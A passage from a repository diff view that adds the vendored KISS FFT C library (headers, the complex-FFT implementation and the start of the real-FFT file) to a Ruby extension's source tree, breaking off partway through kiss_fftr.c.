THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*/
/* kiss_fft.h
defines kiss_fft_scalar as either short or a float type
and defines
typedef struct { kiss_fft_scalar r; kiss_fft_scalar i; }kiss_fft_cpx; */
#include "kiss_fft.h"
#include <limits.h>
#define MAXFACTORS 32
/* e.g. an fft of length 128 has 4 factors
as far as kissfft is concerned
4*4*4*2
*/
struct kiss_fft_state{
int nfft;
int inverse;
int factors[2*MAXFACTORS];
kiss_fft_cpx twiddles[1];
};
/*
Explanation of macros dealing with complex math:
C_MUL(m,a,b) : m = a*b
C_FIXDIV( c , div ) : if a fixed point impl., c /= div. noop otherwise
C_SUB( res, a,b) : res = a - b
C_SUBFROM( res , a) : res -= a
C_ADDTO( res , a) : res += a
* */
#ifdef FIXED_POINT
#if (FIXED_POINT==32)
# define FRACBITS 31
# define SAMPPROD int64_t
#define SAMP_MAX 2147483647
#else
# define FRACBITS 15
# define SAMPPROD int32_t
#define SAMP_MAX 32767
#endif
#define SAMP_MIN -SAMP_MAX
#if defined(CHECK_OVERFLOW)
# define CHECK_OVERFLOW_OP(a,op,b) \
if ( (SAMPPROD)(a) op (SAMPPROD)(b) > SAMP_MAX || (SAMPPROD)(a) op (SAMPPROD)(b) < SAMP_MIN ) { \
fprintf(stderr,"WARNING:overflow @ " __FILE__ "(%d): (%d " #op" %d) = %ld\n",__LINE__,(a),(b),(SAMPPROD)(a) op (SAMPPROD)(b) ); }
#endif
# define smul(a,b) ( (SAMPPROD)(a)*(b) )
# define sround( x ) (kiss_fft_scalar)( ( (x) + (1<<(FRACBITS-1)) ) >> FRACBITS )
# define S_MUL(a,b) sround( smul(a,b) )
# define C_MUL(m,a,b) \
do{ (m).r = sround( smul((a).r,(b).r) - smul((a).i,(b).i) ); \
(m).i = sround( smul((a).r,(b).i) + smul((a).i,(b).r) ); }while(0)
# define DIVSCALAR(x,k) \
(x) = sround( smul( x, SAMP_MAX/k ) )
# define C_FIXDIV(c,div) \
do { DIVSCALAR( (c).r , div); \
DIVSCALAR( (c).i , div); }while (0)
# define C_MULBYSCALAR( c, s ) \
do{ (c).r = sround( smul( (c).r , s ) ) ;\
(c).i = sround( smul( (c).i , s ) ) ; }while(0)
#else /* not FIXED_POINT*/
# define S_MUL(a,b) ( (a)*(b) )
#define C_MUL(m,a,b) \
do{ (m).r = (a).r*(b).r - (a).i*(b).i;\
(m).i = (a).r*(b).i + (a).i*(b).r; }while(0)
# define C_FIXDIV(c,div) /* NOOP */
# define C_MULBYSCALAR( c, s ) \
do{ (c).r *= (s);\
(c).i *= (s); }while(0)
#endif
#ifndef CHECK_OVERFLOW_OP
# define CHECK_OVERFLOW_OP(a,op,b) /* noop */
#endif
#define C_ADD( res, a,b)\
do { \
CHECK_OVERFLOW_OP((a).r,+,(b).r)\
CHECK_OVERFLOW_OP((a).i,+,(b).i)\
(res).r=(a).r+(b).r; (res).i=(a).i+(b).i; \
}while(0)
#define C_SUB( res, a,b)\
do { \
CHECK_OVERFLOW_OP((a).r,-,(b).r)\
CHECK_OVERFLOW_OP((a).i,-,(b).i)\
(res).r=(a).r-(b).r; (res).i=(a).i-(b).i; \
}while(0)
#define C_ADDTO( res , a)\
do { \
CHECK_OVERFLOW_OP((res).r,+,(a).r)\
CHECK_OVERFLOW_OP((res).i,+,(a).i)\
(res).r += (a).r; (res).i += (a).i;\
}while(0)
#define C_SUBFROM( res , a)\
do {\
CHECK_OVERFLOW_OP((res).r,-,(a).r)\
CHECK_OVERFLOW_OP((res).i,-,(a).i)\
(res).r -= (a).r; (res).i -= (a).i; \
}while(0)
#ifdef FIXED_POINT
# define KISS_FFT_COS(phase) floor(.5+SAMP_MAX * cos (phase))
# define KISS_FFT_SIN(phase) floor(.5+SAMP_MAX * sin (phase))
# define HALF_OF(x) ((x)>>1)
#elif defined(USE_SIMD)
# define KISS_FFT_COS(phase) _mm_set1_ps( cos(phase) )
# define KISS_FFT_SIN(phase) _mm_set1_ps( sin(phase) )
# define HALF_OF(x) ((x)*_mm_set1_ps(.5))
#else
# define KISS_FFT_COS(phase) (kiss_fft_scalar) cos(phase)
# define KISS_FFT_SIN(phase) (kiss_fft_scalar) sin(phase)
# define HALF_OF(x) ((x)*.5)
#endif
#define kf_cexp(x,phase) \
do{ \
(x)->r = KISS_FFT_COS(phase);\
(x)->i = KISS_FFT_SIN(phase);\
}while(0)
/* a debugging function */
#define pcpx(c)\
fprintf(stderr,"%g + %gi\n",(double)((c)->r),(double)((c)->i) )

164
external/ruby-kissfft/ext/kissfft/_kiss_fft_guts.h vendored Normal file
View File

@ -0,0 +1,164 @@
/*
Copyright (c) 2003-2010, Mark Borgerding
All rights reserved.
Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
* Neither the author nor the names of any contributors may be used to endorse or promote products derived from this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*/
/* kiss_fft.h
defines kiss_fft_scalar as either short or a float type
and defines
typedef struct { kiss_fft_scalar r; kiss_fft_scalar i; }kiss_fft_cpx; */
#include "kiss_fft.h"
#include <limits.h>
#define MAXFACTORS 32
/* e.g. an fft of length 128 has 4 factors
as far as kissfft is concerned
4*4*4*2
*/
struct kiss_fft_state{
int nfft;
int inverse;
int factors[2*MAXFACTORS];
kiss_fft_cpx twiddles[1];
};
/*
Explanation of macros dealing with complex math:
C_MUL(m,a,b) : m = a*b
C_FIXDIV( c , div ) : if a fixed point impl., c /= div. noop otherwise
C_SUB( res, a,b) : res = a - b
C_SUBFROM( res , a) : res -= a
C_ADDTO( res , a) : res += a
* */
#ifdef FIXED_POINT
#if (FIXED_POINT==32)
# define FRACBITS 31
# define SAMPPROD int64_t
#define SAMP_MAX 2147483647
#else
# define FRACBITS 15
# define SAMPPROD int32_t
#define SAMP_MAX 32767
#endif
#define SAMP_MIN -SAMP_MAX
#if defined(CHECK_OVERFLOW)
# define CHECK_OVERFLOW_OP(a,op,b) \
if ( (SAMPPROD)(a) op (SAMPPROD)(b) > SAMP_MAX || (SAMPPROD)(a) op (SAMPPROD)(b) < SAMP_MIN ) { \
fprintf(stderr,"WARNING:overflow @ " __FILE__ "(%d): (%d " #op" %d) = %ld\n",__LINE__,(a),(b),(SAMPPROD)(a) op (SAMPPROD)(b) ); }
#endif
# define smul(a,b) ( (SAMPPROD)(a)*(b) )
# define sround( x ) (kiss_fft_scalar)( ( (x) + (1<<(FRACBITS-1)) ) >> FRACBITS )
# define S_MUL(a,b) sround( smul(a,b) )
# define C_MUL(m,a,b) \
do{ (m).r = sround( smul((a).r,(b).r) - smul((a).i,(b).i) ); \
(m).i = sround( smul((a).r,(b).i) + smul((a).i,(b).r) ); }while(0)
# define DIVSCALAR(x,k) \
(x) = sround( smul( x, SAMP_MAX/k ) )
# define C_FIXDIV(c,div) \
do { DIVSCALAR( (c).r , div); \
DIVSCALAR( (c).i , div); }while (0)
# define C_MULBYSCALAR( c, s ) \
do{ (c).r = sround( smul( (c).r , s ) ) ;\
(c).i = sround( smul( (c).i , s ) ) ; }while(0)
#else /* not FIXED_POINT*/
# define S_MUL(a,b) ( (a)*(b) )
#define C_MUL(m,a,b) \
do{ (m).r = (a).r*(b).r - (a).i*(b).i;\
(m).i = (a).r*(b).i + (a).i*(b).r; }while(0)
# define C_FIXDIV(c,div) /* NOOP */
# define C_MULBYSCALAR( c, s ) \
do{ (c).r *= (s);\
(c).i *= (s); }while(0)
#endif
#ifndef CHECK_OVERFLOW_OP
# define CHECK_OVERFLOW_OP(a,op,b) /* noop */
#endif
#define C_ADD( res, a,b)\
do { \
CHECK_OVERFLOW_OP((a).r,+,(b).r)\
CHECK_OVERFLOW_OP((a).i,+,(b).i)\
(res).r=(a).r+(b).r; (res).i=(a).i+(b).i; \
}while(0)
#define C_SUB( res, a,b)\
do { \
CHECK_OVERFLOW_OP((a).r,-,(b).r)\
CHECK_OVERFLOW_OP((a).i,-,(b).i)\
(res).r=(a).r-(b).r; (res).i=(a).i-(b).i; \
}while(0)
#define C_ADDTO( res , a)\
do { \
CHECK_OVERFLOW_OP((res).r,+,(a).r)\
CHECK_OVERFLOW_OP((res).i,+,(a).i)\
(res).r += (a).r; (res).i += (a).i;\
}while(0)
#define C_SUBFROM( res , a)\
do {\
CHECK_OVERFLOW_OP((res).r,-,(a).r)\
CHECK_OVERFLOW_OP((res).i,-,(a).i)\
(res).r -= (a).r; (res).i -= (a).i; \
}while(0)
#ifdef FIXED_POINT
# define KISS_FFT_COS(phase) floor(.5+SAMP_MAX * cos (phase))
# define KISS_FFT_SIN(phase) floor(.5+SAMP_MAX * sin (phase))
# define HALF_OF(x) ((x)>>1)
#elif defined(USE_SIMD)
# define KISS_FFT_COS(phase) _mm_set1_ps( cos(phase) )
# define KISS_FFT_SIN(phase) _mm_set1_ps( sin(phase) )
# define HALF_OF(x) ((x)*_mm_set1_ps(.5))
#else
# define KISS_FFT_COS(phase) (kiss_fft_scalar) cos(phase)
# define KISS_FFT_SIN(phase) (kiss_fft_scalar) sin(phase)
# define HALF_OF(x) ((x)*.5)
#endif
#define kf_cexp(x,phase) \
do{ \
(x)->r = KISS_FFT_COS(phase);\
(x)->i = KISS_FFT_SIN(phase);\
}while(0)
/* a debugging function */
#define pcpx(c)\
fprintf(stderr,"%g + %gi\n",(double)((c)->r),(double)((c)->i) )
#ifdef KISS_FFT_USE_ALLOCA
// define this to allow use of alloca instead of malloc for temporary buffers
// Temporary buffers are used in two case:
// 1. FFT sizes that have "bad" factors. i.e. not 2,3 and 5
// 2. "in-place" FFTs. Notice the quotes, since kissfft does not really do an in-place transform.
#include <alloca.h>
#define KISS_FFT_TMP_ALLOC(nbytes) alloca(nbytes)
#define KISS_FFT_TMP_FREE(ptr)
#else
#define KISS_FFT_TMP_ALLOC(nbytes) KISS_FFT_MALLOC(nbytes)
#define KISS_FFT_TMP_FREE(ptr) KISS_FFT_FREE(ptr)
#endif

0
external/ruby-kissfft/extconf.rb → external/ruby-kissfft/ext/kissfft/extconf.rb vendored
View File

408
external/ruby-kissfft/ext/kissfft/kiss_fft.c vendored Normal file
View File

@ -0,0 +1,408 @@
/*
Copyright (c) 2003-2010, Mark Borgerding
All rights reserved.
Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
* Neither the author nor the names of any contributors may be used to endorse or promote products derived from this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*/
#include "_kiss_fft_guts.h"
/* The guts header contains all the multiplication and addition macros that are defined for
fixed or floating point complex numbers. It also delares the kf_ internal functions.
*/
static void kf_bfly2(
kiss_fft_cpx * Fout,
const size_t fstride,
const kiss_fft_cfg st,
int m
)
{
kiss_fft_cpx * Fout2;
kiss_fft_cpx * tw1 = st->twiddles;
kiss_fft_cpx t;
Fout2 = Fout + m;
do{
C_FIXDIV(*Fout,2); C_FIXDIV(*Fout2,2);
C_MUL (t, *Fout2 , *tw1);
tw1 += fstride;
C_SUB( *Fout2 , *Fout , t );
C_ADDTO( *Fout , t );
++Fout2;
++Fout;
}while (--m);
}
static void kf_bfly4(
kiss_fft_cpx * Fout,
const size_t fstride,
const kiss_fft_cfg st,
const size_t m
)
{
kiss_fft_cpx *tw1,*tw2,*tw3;
kiss_fft_cpx scratch[6];
size_t k=m;
const size_t m2=2*m;
const size_t m3=3*m;
tw3 = tw2 = tw1 = st->twiddles;
do {
C_FIXDIV(*Fout,4); C_FIXDIV(Fout[m],4); C_FIXDIV(Fout[m2],4); C_FIXDIV(Fout[m3],4);
C_MUL(scratch[0],Fout[m] , *tw1 );
C_MUL(scratch[1],Fout[m2] , *tw2 );
C_MUL(scratch[2],Fout[m3] , *tw3 );
C_SUB( scratch[5] , *Fout, scratch[1] );
C_ADDTO(*Fout, scratch[1]);
C_ADD( scratch[3] , scratch[0] , scratch[2] );
C_SUB( scratch[4] , scratch[0] , scratch[2] );
C_SUB( Fout[m2], *Fout, scratch[3] );
tw1 += fstride;
tw2 += fstride*2;
tw3 += fstride*3;
C_ADDTO( *Fout , scratch[3] );
if(st->inverse) {
Fout[m].r = scratch[5].r - scratch[4].i;
Fout[m].i = scratch[5].i + scratch[4].r;
Fout[m3].r = scratch[5].r + scratch[4].i;
Fout[m3].i = scratch[5].i - scratch[4].r;
}else{
Fout[m].r = scratch[5].r + scratch[4].i;
Fout[m].i = scratch[5].i - scratch[4].r;
Fout[m3].r = scratch[5].r - scratch[4].i;
Fout[m3].i = scratch[5].i + scratch[4].r;
}
++Fout;
}while(--k);
}
static void kf_bfly3(
kiss_fft_cpx * Fout,
const size_t fstride,
const kiss_fft_cfg st,
size_t m
)
{
size_t k=m;
const size_t m2 = 2*m;
kiss_fft_cpx *tw1,*tw2;
kiss_fft_cpx scratch[5];
kiss_fft_cpx epi3;
epi3 = st->twiddles[fstride*m];
tw1=tw2=st->twiddles;
do{
C_FIXDIV(*Fout,3); C_FIXDIV(Fout[m],3); C_FIXDIV(Fout[m2],3);
C_MUL(scratch[1],Fout[m] , *tw1);
C_MUL(scratch[2],Fout[m2] , *tw2);
C_ADD(scratch[3],scratch[1],scratch[2]);
C_SUB(scratch[0],scratch[1],scratch[2]);
tw1 += fstride;
tw2 += fstride*2;
Fout[m].r = Fout->r - HALF_OF(scratch[3].r);
Fout[m].i = Fout->i - HALF_OF(scratch[3].i);
C_MULBYSCALAR( scratch[0] , epi3.i );
C_ADDTO(*Fout,scratch[3]);
Fout[m2].r = Fout[m].r + scratch[0].i;
Fout[m2].i = Fout[m].i - scratch[0].r;
Fout[m].r -= scratch[0].i;
Fout[m].i += scratch[0].r;
++Fout;
}while(--k);
}
static void kf_bfly5(
kiss_fft_cpx * Fout,
const size_t fstride,
const kiss_fft_cfg st,
int m
)
{
kiss_fft_cpx *Fout0,*Fout1,*Fout2,*Fout3,*Fout4;
int u;
kiss_fft_cpx scratch[13];
kiss_fft_cpx * twiddles = st->twiddles;
kiss_fft_cpx *tw;
kiss_fft_cpx ya,yb;
ya = twiddles[fstride*m];
yb = twiddles[fstride*2*m];
Fout0=Fout;
Fout1=Fout0+m;
Fout2=Fout0+2*m;
Fout3=Fout0+3*m;
Fout4=Fout0+4*m;
tw=st->twiddles;
for ( u=0; u<m; ++u ) {
C_FIXDIV( *Fout0,5); C_FIXDIV( *Fout1,5); C_FIXDIV( *Fout2,5); C_FIXDIV( *Fout3,5); C_FIXDIV( *Fout4,5);
scratch[0] = *Fout0;
C_MUL(scratch[1] ,*Fout1, tw[u*fstride]);
C_MUL(scratch[2] ,*Fout2, tw[2*u*fstride]);
C_MUL(scratch[3] ,*Fout3, tw[3*u*fstride]);
C_MUL(scratch[4] ,*Fout4, tw[4*u*fstride]);
C_ADD( scratch[7],scratch[1],scratch[4]);
C_SUB( scratch[10],scratch[1],scratch[4]);
C_ADD( scratch[8],scratch[2],scratch[3]);
C_SUB( scratch[9],scratch[2],scratch[3]);
Fout0->r += scratch[7].r + scratch[8].r;
Fout0->i += scratch[7].i + scratch[8].i;
scratch[5].r = scratch[0].r + S_MUL(scratch[7].r,ya.r) + S_MUL(scratch[8].r,yb.r);
scratch[5].i = scratch[0].i + S_MUL(scratch[7].i,ya.r) + S_MUL(scratch[8].i,yb.r);
scratch[6].r = S_MUL(scratch[10].i,ya.i) + S_MUL(scratch[9].i,yb.i);
scratch[6].i = -S_MUL(scratch[10].r,ya.i) - S_MUL(scratch[9].r,yb.i);
C_SUB(*Fout1,scratch[5],scratch[6]);
C_ADD(*Fout4,scratch[5],scratch[6]);
scratch[11].r = scratch[0].r + S_MUL(scratch[7].r,yb.r) + S_MUL(scratch[8].r,ya.r);
scratch[11].i = scratch[0].i + S_MUL(scratch[7].i,yb.r) + S_MUL(scratch[8].i,ya.r);
scratch[12].r = - S_MUL(scratch[10].i,yb.i) + S_MUL(scratch[9].i,ya.i);
scratch[12].i = S_MUL(scratch[10].r,yb.i) - S_MUL(scratch[9].r,ya.i);
C_ADD(*Fout2,scratch[11],scratch[12]);
C_SUB(*Fout3,scratch[11],scratch[12]);
++Fout0;++Fout1;++Fout2;++Fout3;++Fout4;
}
}
/* perform the butterfly for one stage of a mixed radix FFT */
static void kf_bfly_generic(
kiss_fft_cpx * Fout,
const size_t fstride,
const kiss_fft_cfg st,
int m,
int p
)
{
int u,k,q1,q;
kiss_fft_cpx * twiddles = st->twiddles;
kiss_fft_cpx t;
int Norig = st->nfft;
kiss_fft_cpx * scratch = (kiss_fft_cpx*)KISS_FFT_TMP_ALLOC(sizeof(kiss_fft_cpx)*p);
for ( u=0; u<m; ++u ) {
k=u;
for ( q1=0 ; q1<p ; ++q1 ) {
scratch[q1] = Fout[ k ];
C_FIXDIV(scratch[q1],p);
k += m;
}
k=u;
for ( q1=0 ; q1<p ; ++q1 ) {
int twidx=0;
Fout[ k ] = scratch[0];
for (q=1;q<p;++q ) {
twidx += fstride * k;
if (twidx>=Norig) twidx-=Norig;
C_MUL(t,scratch[q] , twiddles[twidx] );
C_ADDTO( Fout[ k ] ,t);
}
k += m;
}
}
KISS_FFT_TMP_FREE(scratch);
}
static
void kf_work(
kiss_fft_cpx * Fout,
const kiss_fft_cpx * f,
const size_t fstride,
int in_stride,
int * factors,
const kiss_fft_cfg st
)
{
kiss_fft_cpx * Fout_beg=Fout;
const int p=*factors++; /* the radix */
const int m=*factors++; /* stage's fft length/p */
const kiss_fft_cpx * Fout_end = Fout + p*m;
#ifdef _OPENMP
// use openmp extensions at the
// top-level (not recursive)
if (fstride==1 && p<=5)
{
int k;
// execute the p different work units in different threads
# pragma omp parallel for
for (k=0;k<p;++k)
kf_work( Fout +k*m, f+ fstride*in_stride*k,fstride*p,in_stride,factors,st);
// all threads have joined by this point
switch (p) {
case 2: kf_bfly2(Fout,fstride,st,m); break;
case 3: kf_bfly3(Fout,fstride,st,m); break;
case 4: kf_bfly4(Fout,fstride,st,m); break;
case 5: kf_bfly5(Fout,fstride,st,m); break;
default: kf_bfly_generic(Fout,fstride,st,m,p); break;
}
return;
}
#endif
if (m==1) {
do{
*Fout = *f;
f += fstride*in_stride;
}while(++Fout != Fout_end );
}else{
do{
// recursive call:
// DFT of size m*p performed by doing
// p instances of smaller DFTs of size m,
// each one takes a decimated version of the input
kf_work( Fout , f, fstride*p, in_stride, factors,st);
f += fstride*in_stride;
}while( (Fout += m) != Fout_end );
}
Fout=Fout_beg;
// recombine the p smaller DFTs
switch (p) {
case 2: kf_bfly2(Fout,fstride,st,m); break;
case 3: kf_bfly3(Fout,fstride,st,m); break;
case 4: kf_bfly4(Fout,fstride,st,m); break;
case 5: kf_bfly5(Fout,fstride,st,m); break;
default: kf_bfly_generic(Fout,fstride,st,m,p); break;
}
}
/* facbuf is populated by p1,m1,p2,m2, ...
where
p[i] * m[i] = m[i-1]
m0 = n */
static
void kf_factor(int n,int * facbuf)
{
int p=4;
double floor_sqrt;
floor_sqrt = floor( sqrt((double)n) );
/*factor out powers of 4, powers of 2, then any remaining primes */
do {
while (n % p) {
switch (p) {
case 4: p = 2; break;
case 2: p = 3; break;
default: p += 2; break;
}
if (p > floor_sqrt)
p = n; /* no more factors, skip to end */
}
n /= p;
*facbuf++ = p;
*facbuf++ = n;
} while (n > 1);
}
/*
*
* User-callable function to allocate all necessary storage space for the fft.
*
* The return value is a contiguous block of memory, allocated with malloc. As such,
* It can be freed with free(), rather than a kiss_fft-specific function.
* */
kiss_fft_cfg kiss_fft_alloc(int nfft,int inverse_fft,void * mem,size_t * lenmem )
{
kiss_fft_cfg st=NULL;
size_t memneeded = sizeof(struct kiss_fft_state)
+ sizeof(kiss_fft_cpx)*(nfft-1); /* twiddle factors*/
if ( lenmem==NULL ) {
st = ( kiss_fft_cfg)KISS_FFT_MALLOC( memneeded );
}else{
if (mem != NULL && *lenmem >= memneeded)
st = (kiss_fft_cfg)mem;
*lenmem = memneeded;
}
if (st) {
int i;
st->nfft=nfft;
st->inverse = inverse_fft;
for (i=0;i<nfft;++i) {
const double pi=3.141592653589793238462643383279502884197169399375105820974944;
double phase = -2*pi*i / nfft;
if (st->inverse)
phase *= -1;
kf_cexp(st->twiddles+i, phase );
}
kf_factor(nfft,st->factors);
}
return st;
}
void kiss_fft_stride(kiss_fft_cfg st,const kiss_fft_cpx *fin,kiss_fft_cpx *fout,int in_stride)
{
if (fin == fout) {
//NOTE: this is not really an in-place FFT algorithm.
//It just performs an out-of-place FFT into a temp buffer
kiss_fft_cpx * tmpbuf = (kiss_fft_cpx*)KISS_FFT_TMP_ALLOC( sizeof(kiss_fft_cpx)*st->nfft);
kf_work(tmpbuf,fin,1,in_stride, st->factors,st);
memcpy(fout,tmpbuf,sizeof(kiss_fft_cpx)*st->nfft);
KISS_FFT_TMP_FREE(tmpbuf);
}else{
kf_work( fout, fin, 1,in_stride, st->factors,st );
}
}
void kiss_fft(kiss_fft_cfg cfg,const kiss_fft_cpx *fin,kiss_fft_cpx *fout)
{
kiss_fft_stride(cfg,fin,fout,1);
}
void kiss_fft_cleanup(void)
{
// nothing needed any more
}
int kiss_fft_next_fast_size(int n)
{
while(1) {
int m=n;
while ( (m%2) == 0 ) m/=2;
while ( (m%3) == 0 ) m/=3;
while ( (m%5) == 0 ) m/=5;
if (m<=1)
break; /* n is completely factorable by twos, threes, and fives */
n++;
}
return n;
}

124
external/ruby-kissfft/ext/kissfft/kiss_fft.h vendored Normal file
View File

@ -0,0 +1,124 @@
#ifndef KISS_FFT_H
#define KISS_FFT_H
#include <stdlib.h>
#include <stdio.h>
#include <math.h>
#include <string.h>
#ifdef __cplusplus
extern "C" {
#endif
/*
ATTENTION!
If you would like a :
-- a utility that will handle the caching of fft objects
-- real-only (no imaginary time component ) FFT
-- a multi-dimensional FFT
-- a command-line utility to perform ffts
-- a command-line utility to perform fast-convolution filtering
Then see kfc.h kiss_fftr.h kiss_fftnd.h fftutil.c kiss_fastfir.c
in the tools/ directory.
*/
#ifdef USE_SIMD
# include <xmmintrin.h>
# define kiss_fft_scalar __m128
#define KISS_FFT_MALLOC(nbytes) _mm_malloc(nbytes,16)
#define KISS_FFT_FREE _mm_free
#else
#define KISS_FFT_MALLOC malloc
#define KISS_FFT_FREE free
#endif
#ifdef FIXED_POINT
#include <sys/types.h>
# if (FIXED_POINT == 32)
# define kiss_fft_scalar int32_t
# else
# define kiss_fft_scalar int16_t
# endif
#else
# ifndef kiss_fft_scalar
/* default is float */
# define kiss_fft_scalar float
# endif
#endif
typedef struct {
kiss_fft_scalar r;
kiss_fft_scalar i;
}kiss_fft_cpx;
typedef struct kiss_fft_state* kiss_fft_cfg;
/*
* kiss_fft_alloc
*
* Initialize a FFT (or IFFT) algorithm's cfg/state buffer.
*
* typical usage: kiss_fft_cfg mycfg=kiss_fft_alloc(1024,0,NULL,NULL);
*
* The return value from fft_alloc is a cfg buffer used internally
* by the fft routine or NULL.
*
* If lenmem is NULL, then kiss_fft_alloc will allocate a cfg buffer using malloc.
* The returned value should be free()d when done to avoid memory leaks.
*
* The state can be placed in a user supplied buffer 'mem':
* If lenmem is not NULL and mem is not NULL and *lenmem is large enough,
* then the function places the cfg in mem and the size used in *lenmem
* and returns mem.
*
* If lenmem is not NULL and ( mem is NULL or *lenmem is not large enough),
* then the function returns NULL and places the minimum cfg
* buffer size in *lenmem.
* */
kiss_fft_cfg kiss_fft_alloc(int nfft,int inverse_fft,void * mem,size_t * lenmem);
/*
* kiss_fft(cfg,in_out_buf)
*
* Perform an FFT on a complex input buffer.
* for a forward FFT,
* fin should be f[0] , f[1] , ... ,f[nfft-1]
* fout will be F[0] , F[1] , ... ,F[nfft-1]
* Note that each element is complex and can be accessed like
f[k].r and f[k].i
* */
void kiss_fft(kiss_fft_cfg cfg,const kiss_fft_cpx *fin,kiss_fft_cpx *fout);
/*
A more generic version of the above function. It reads its input from every Nth sample.
* */
void kiss_fft_stride(kiss_fft_cfg cfg,const kiss_fft_cpx *fin,kiss_fft_cpx *fout,int fin_stride);
/* If kiss_fft_alloc allocated a buffer, it is one contiguous
buffer and can be simply free()d when no longer needed*/
#define kiss_fft_free free
/*
Cleans up some memory that gets managed internally. Not necessary to call, but it might clean up
your compiler output to call this before you exit.
*/
void kiss_fft_cleanup(void);
/*
* Returns the smallest integer k, such that k>=n and k has only "fast" factors (2,3,5)
*/
int kiss_fft_next_fast_size(int n);
/* for real ffts, we need an even size */
#define kiss_fftr_next_fast_size_real(n) \
(kiss_fft_next_fast_size( ((n)+1)>>1)<<1)
#ifdef __cplusplus
}
#endif
#endif

159
external/ruby-kissfft/ext/kissfft/kiss_fftr.c vendored Normal file
View File

@ -0,0 +1,159 @@
/*
Copyright (c) 2003-2004, Mark Borgerding
All rights reserved.
Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
* Neither the author nor the names of any contributors may be used to endorse or promote products derived from this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*/
#include "kiss_fftr.h"
#include "_kiss_fft_guts.h"
struct kiss_fftr_state{
kiss_fft_cfg substate;
kiss_fft_cpx * tmpbuf;
kiss_fft_cpx * super_twiddles;
#ifdef USE_SIMD
void * pad;
#endif
};
kiss_fftr_cfg kiss_fftr_alloc(int nfft,int inverse_fft,void * mem,size_t * lenmem)
{
int i;
kiss_fftr_cfg st = NULL;
size_t subsize, memneeded;
if (nfft & 1) {
